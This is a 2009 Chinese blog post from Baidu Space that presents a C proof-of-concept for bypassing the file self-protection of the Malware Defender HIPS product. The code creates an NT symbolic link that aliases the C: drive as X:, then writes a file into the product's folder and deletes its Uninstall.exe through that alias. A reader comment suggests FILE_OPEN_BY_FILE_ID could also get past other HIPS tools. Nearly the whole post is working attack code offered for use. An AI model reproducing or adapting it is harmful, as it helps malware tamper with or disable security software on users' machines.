百度空间 | 百度首页 
 
查看文章
 
我也来绕过MD文件保护01
2009年11月01日 星期日 16:56

先来个简单的。 另外。。。MARK下 FILE_OPEN_BY_FILE_ID

HANDLE hC;

OBJECT_ATTRIBUTES ObjectAttributes;

INIT_UNICODE(uniSectionName, L"\\??\\C:");

INIT_UNICODE(LinkTarget,L"\\??\\X:");

    #define OBJ_CASE_INSENSITIVE 0x00000040L

    #define OBJ_KERNEL_HANDLE   0x00000200L;

InitializeObjectAttributes(&ObjectAttributes,&LinkTarget,

       0x00000040L | OBJ_KERNEL_HANDLE,0,NULL);

int x = NtCreateSymbolicLinkObject(&hC, 0x000F0000L | 0x1 ,&ObjectAttributes,&uniSectionName);

CreateFile("X:\\Program Files\\Malware Defender\\hxxxxxxxx.exe",FILE_ADD_FILE,

FILE_SHARE_READ,NULL,CREATE_ALWAYS ,FILE_ATTRIBUTE_NORMAL,0);

CreateFile("X:\\Program Files\\Malware Defender\\Uninstall.exe",

DELETE ,     0,    0,    OPEN_EXISTING ,    FILE_FLAG_DELETE_ON_CLOSE,0);


类别:默认分类 | 添加到搜藏 | 浏览() | 评论 (1)
 
最近读者:
 
网友评论:
1
2009年11月02日 星期一 13:35 | 回复
FILE_OPEN_BY_FILE_ID 很强大啊 说不定能过其它一些hips
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu